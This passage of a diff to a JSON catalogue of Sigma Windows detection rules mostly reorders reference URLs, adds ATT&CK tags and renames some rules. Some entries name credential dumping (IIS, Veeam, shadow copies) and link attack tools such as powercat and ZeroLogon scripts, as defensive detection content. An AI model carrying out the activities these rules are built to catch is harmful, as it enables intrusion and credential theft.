"logsource.product": "windows", "refs": [ - "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", "https://github.com/GhostPack/Seatbelt", + "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" ], "tags": [ @@ -71096,9 +72227,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo", - "https://www.echotrail.io/insights/search/regsvr32.exe", "https://redcanary.com/blog/intelligence-insights-april-2022/", + "https://www.echotrail.io/insights/search/regsvr32.exe", + "https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml" ], "tags": [ @@ -71119,9 +72250,9 @@ "value": "Potentially Suspicious Child Process Of Regsvr32" }, { - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "description": "Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.", "meta": { - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti'", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti', Aaron Herman", "creation_date": "2022/01/25", "falsepositive": [ "Rare false positives could occur on servers with multiple drives." @@ -71131,8 +72262,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/", + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://www.scythe.io/library/threat-emulation-qakbot", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml" ], @@ -71141,7 +72272,7 @@ ] }, "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", - "value": "LOLBIN From Abnormal Drive" + "value": "LOLBIN Execution From Abnormal Drive" }, { "description": "Detects the rare use of the command line tool shutdown to logoff a user", @@ -71223,8 +72354,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", + "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml" ], "tags": [ @@ -71291,8 +72422,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml" ], "tags": [ @@ -71358,10 +72489,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://isc.sans.edu/diary/22264", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml" ], @@ -71405,10 +72536,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", - "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" ], "tags": [ @@ -71452,8 +72583,20 @@ "https://twitter.com/mrd0x/status/1481630810495139841?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_executable_invalid_extension.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", "value": "Rundll32 Execution Without DLL File" }, @@ -71505,8 +72648,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", - "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", + "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml" ], "tags": [ @@ -71539,8 +72682,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/GelosSnake/status/934900723426439170", "https://asec.ahnlab.com/en/39828/", + "https://twitter.com/GelosSnake/status/934900723426439170", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml" ], "tags": [ @@ -71641,8 +72784,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml" ], "tags": [ @@ -71708,9 +72851,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military", "https://learn.microsoft.com/en-us/windows/win32/shell/csidl", - "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" ], "tags": [ @@ -71825,8 +72968,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", + "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" ], "tags": [ @@ -71933,8 +73076,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", + "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_custom_source.yml" ], "tags": [ @@ -72179,10 +73322,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://youtu.be/5mqid-7zp8k?t=2481", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_mailboxexport_share.yml" ], "tags": [ @@ -72206,8 +73349,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" ], "tags": [ @@ -72308,8 +73451,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" ], "tags": [ @@ -72346,8 +73489,39 @@ "https://processhacker.sourceforge.io/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_process_hacker.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.discovery", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1622", + "attack.t1564", + "attack.t1543" + ] }, + "related": [ + { + "dest-uuid": "e4dc8c01-417f-458d-9ee0-bb0617c1b391", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42", "value": "PUA - Process Hacker Execution" }, @@ -72364,9 +73538,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" ], "tags": [ @@ -72600,8 +73774,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_shadowcopy_access.yml" ], "tags": [ @@ -72634,8 +73808,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://twitter.com/_st0pp3r_/status/1583914515996897281", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" ], @@ -72669,8 +73843,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", "https://twitter.com/kmkz_security/status/1220694202301976576", + "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml" ], "tags": [ @@ -72737,9 +73911,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", "https://www.exploit-db.com/exploits/37525", "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", - "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" ], "tags": [ @@ -73056,6 +74230,7 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/ber_m1ng/status/1397948048135778309", "https://www.cobaltstrike.com/help-opsec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_no_params.yml" ], @@ -73074,7 +74249,7 @@ } ], "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a", - "value": "Suspicious Rundll32 Without Any CommandLine Params" + "value": "Rundll32 Execution Without CommandLine Parameters" }, { "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", @@ -73133,11 +74308,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", - "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" ], "tags": [ @@ -73213,10 +74388,10 @@ "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml" ], "tags": [ @@ -73250,8 +74425,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", - "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://abuse.io/lockergoga.txt", + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_trace_evasion.yml" ], "tags": [ @@ -73394,9 +74569,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/issues/1009", - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml" ], "tags": [ @@ -73654,8 +74829,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", "https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/", + "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" ], "tags": [ @@ -73677,7 +74852,40 @@ "value": "New Network Trace Capture Started Via Netsh.EXE" }, { - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "meta": { + "author": "Florian Roth (Nextron Systems), Tigzy", + "creation_date": "2021/11/17", + "falsepositive": [ + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + ], + "filename": "proc_creation_win_winrar_uncommon_folder_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1460978167628406785", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", + "value": "Winrar Execution in Non-Standard Folder" + }, + { + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) child process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022/10/14", @@ -73689,15 +74897,36 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/binderlabs/DirCreate2System", "https://www.echotrail.io/insights/search/wermgr.exe", "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", - "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.t1036" + ] }, + "related": [ + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", - "value": "Suspicious WERMGR Process Patterns" + "value": "Suspicious Child Process Of Wermgr.EXE" }, { "description": "Detects suspicious PowerShell invocation command parameters", @@ -73734,9 +74963,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan", - "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/", "https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/", + "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/", + "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssm_agent_abuse.yml" ], "tags": [ @@ -73770,9 +74999,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", - "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", + "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" ], "tags": [ @@ -73818,8 +75047,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", + "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml" ], @@ -73961,8 +75190,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", "https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom", + "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver.yml" ], "tags": [ @@ -74044,8 +75273,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", + "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install.yml" ], @@ -74146,24 +75375,24 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/adrecon/ADRecon", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/samratashok/nishang", - "https://github.com/DarkCoderSc/PowerRunAsSystem/", - "https://adsecurity.org/?p=2921", "https://github.com/Kevin-Robertson/Powermad", "https://github.com/adrecon/AzureADRecon", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/adrecon/ADRecon", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/besimorhino/powercat", + "https://adsecurity.org/?p=2921", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/DarkCoderSc/PowerRunAsSystem/", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml" ], "tags": [ @@ -74398,8 +75627,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml" ], "tags": [ @@ -74449,8 +75678,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md", + "https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_stdin_redirect.yml" ], "tags": [ @@ -74483,8 +75712,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" ], "tags": [ @@ -74693,8 +75922,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/tccontre18/status/1480950986650832903", - "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/", "https://twitter.com/mrd0x/status/1461041276514623491", + "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml" ], "tags": [ @@ -74831,9 +76060,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Psr/", "https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://lolbas-project.github.io/lolbas/Binaries/Psr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml" ], "tags": [ @@ -74868,8 +76097,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.poweradmin.com/paexec/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.poweradmin.com/paexec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" ], "tags": [ @@ -75111,8 +76340,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", "https://twitter.com/ShadowChasing1/status/1552595370961944576", + "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml" ], "tags": [ @@ -75178,9 +76407,9 @@ "logsource.category": "process_creation", "logsource.product": 